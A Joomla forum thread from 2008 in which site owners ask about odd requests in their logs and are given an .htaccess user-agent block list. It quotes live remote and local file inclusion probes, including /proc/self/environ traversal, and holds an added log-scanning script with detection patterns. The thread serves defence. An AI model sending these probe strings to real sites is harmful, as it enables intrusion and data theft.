A collection of strange links on my Joomla site

ased
Joomla! Apprentice
Posts: 15
Joined: Mon Oct 02, 2006 9:33 pm

A collection of strange links on my Joomla site

Postby ased » Mon Aug 11, 2008 12:57 am

Hi,

I found this in my site and I wonder what's going on. I'm using MyBlog from azrul as the front page; when I put these links in the browser they took me to my front page, but there are links to other sites!
How did they do it?
How do I delete it and avoid it in the future?

Thanks for your help

The links:

mysite.com/index.php?view=page&pagename=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt???

mysite.com/index.php?view=page&pagename=http://student-x.com/test.txt?

.mysite.com/index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt???

mysite.com/index.php?view=page&pagename=http://www.mubune.com/plugins/safehtml/oye.txt??

wildazzjw
Joomla! Apprentice
Posts: 8
Joined: Thu Oct 12, 2006 4:07 am

Re: hack attempt

Postby wildazzjw » Mon Sep 15, 2008 2:15 am

I also have this activity in my logs. A Google search vaguely shows this as some sort of hack. Maybe for ZenCart? Not sure I'm able to tell if anything was exploited. Does this work on Joomla?

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
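
To look at the "was anything exploited" question from the log side, the script below (an added example, not part of any post in this thread) scans Apache combined-format log lines for the two request shapes quoted above: a parameter whose value is a remote URL, and a parameter that climbs to /proc/self/environ, with or without a trailing %00. The sample log lines, IP addresses and the remote.example host are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)         # value is a remote URL
TRAVERSAL = re.compile(r'(?:\.\./){2,}|/proc/self/environ')  # path climbs out of the web root

def classify(target):
    """Return the sorted probe types found in one request target's query string."""
    hits = set()
    query = target.partition("?")[2]
    for _name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes values
        if REMOTE_URL.match(value):
            hits.add("remote-include")
        if TRAVERSAL.search(value):
            hits.add("local-include")
        if "\x00" in value:                                  # decoded %00 terminator
            hits.add("null-byte")
    return sorted(hits)

def triage(lines):
    """Return (host, status, agent, probe_types) for every suspicious log line."""
    found = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := classify(m["target"])):
            found.append((m["host"], int(m["status"]), m["agent"], hits))
    return found

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Aug/2008:00:41:07 +0000] "GET /index.php?view=page&pagename='
    'http://remote.example/test.txt? HTTP/1.1" 200 18342 "-" "libwww-perl/5.805"',
    '198.51.100.4 - - [15/Sep/2008:02:03:55 +0000] "GET //index.php?autoLoadConfig[999][0]'
    '[autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../proc/self/environ%00'
    ' HTTP/1.1" 403 214 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [15/Sep/2008:02:04:12 +0000] "GET /index.php?option=com_content&id=3'
    ' HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, status, agent, hits in triage(SAMPLE_LOG):
        print(host, status, agent, ",".join(hits))
```

A 200 status on a flagged line only shows that the request was served, not that the include ran, while a 403 shows the server refused it. Parameters that legitimately carry a URL will also be flagged and need reviewing by hand.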

mandville
Joomla! Master
Posts: 14291
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: A collection of strange links on my Joomla site

Postby mandville » Mon Sep 15, 2008 2:31 am

It MIGHT do, but my guess is it was being called using the libwww bot; ban that in your htaccess and it should dramatically clear up these types of attacks.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Jane Blonde
Joomla! Apprentice
Posts: 41
Joined: Sat Aug 02, 2008 2:42 pm

Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Mon Sep 29, 2008 10:33 am

How do I ban that? What is the exact code?

Code:

SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot


That's what I found with Google, but is that it?

Should we ban other stuff too?

J


Re: A collection of strange links on my Joomla site

Postby mandville » Mon Sep 29, 2008 11:12 am

That's basically correct. If you search this forum, especially some of my posts, you will see the htaccess code I use to ban this and other bad bots.


Re: A collection of strange links on my Joomla site

Postby mandville » Mon Sep 29, 2008 10:09 pm

This is the sort of full htaccess code I meant; adapt to your own use.

Code:

# Tag any request whose User-Agent starts with one of these strings (case-insensitive)
SetEnvIfNoCase User-Agent "^FlashGet" bad_bot
SetEnvIfNoCase User-Agent "^GetRight" bad_bot
SetEnvIfNoCase User-Agent "^GetWeb!" bad_bot
SetEnvIfNoCase User-Agent "^Go!Zilla" bad_bot
SetEnvIfNoCase User-Agent "^httplib" bad_bot
SetEnvIfNoCase User-Agent "^Indy Library" bad_bot
SetEnvIfNoCase User-Agent "^InfoNaviRobot" bad_bot
SetEnvIfNoCase User-Agent "^InterGET" bad_bot
SetEnvIfNoCase User-Agent "^Internet Ninja" bad_bot
SetEnvIfNoCase User-Agent "^LexiBot" bad_bot
SetEnvIfNoCase User-Agent "^libWeb/clsHTTP" bad_bot
SetEnvIfNoCase User-Agent "^libwww" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^LinkextractorPro" bad_bot
SetEnvIfNoCase User-Agent "^Mozilla.*NEWT" bad_bot
SetEnvIfNoCase User-Agent "^Octopus" bad_bot
SetEnvIfNoCase User-Agent "^ProWebWalker" bad_bot
SetEnvIfNoCase User-Agent "^SuperBot" bad_bot
SetEnvIfNoCase User-Agent "^WebAuto" bad_bot
SetEnvIfNoCase User-Agent "^Wells Search II" bad_bot
SetEnvIfNoCase User-Agent "^Wget" bad_bot
SetEnvIfNoCase User-Agent "^wget" bad_bot
# Refuse GET and POST requests that were tagged bad_bot above
<Limit GET POST>
order allow,deny
allow from all
deny from env=bad_bot
</Limit>


Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Tue Sep 30, 2008 10:42 am

Wow! Now you're talking, that's great Mandville, I feel a lot safer!

When I searched your posts for .htaccess I mostly got this one!

JB


Re: A collection of strange links on my Joomla site

Postby mandville » Tue Sep 30, 2008 11:08 am

NP - make sure mod_rewrite is on.
You will notice that a lot of libwww will start appearing in your logs marked "denied by server" or similar.


Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Tue Sep 30, 2008 11:39 am

Code:

RewriteEngine On

:)


Re: A collection of strange links on my Joomla site

Postby mandville » Fri Oct 03, 2008 4:41 pm

Just thought I would check if this code has helped, and if not, have any other issues arisen?


Re: A collection of strange links on my Joomla site

Postby Jane Blonde » Fri Oct 03, 2008 5:41 pm

I have not had a problem since and am implementing it on other Joomla sites, thanks:)

guysmiley
Joomla! Explorer
Posts: 497
Joined: Mon Sep 12, 2005 7:22 pm
Location: Ontario, Canada

Re: A collection of strange links on my Joomla site

Postby guysmiley » Sat Nov 15, 2008 1:20 pm

Greetings,

Thanks for this list ;)

If modsecurity is already catching it, am I burdening the server unnecessarily by adding these lines to my .htaccess?

IOW, should I add these lines to .htaccess if modsecurity is already nabbing them?

Thanks!

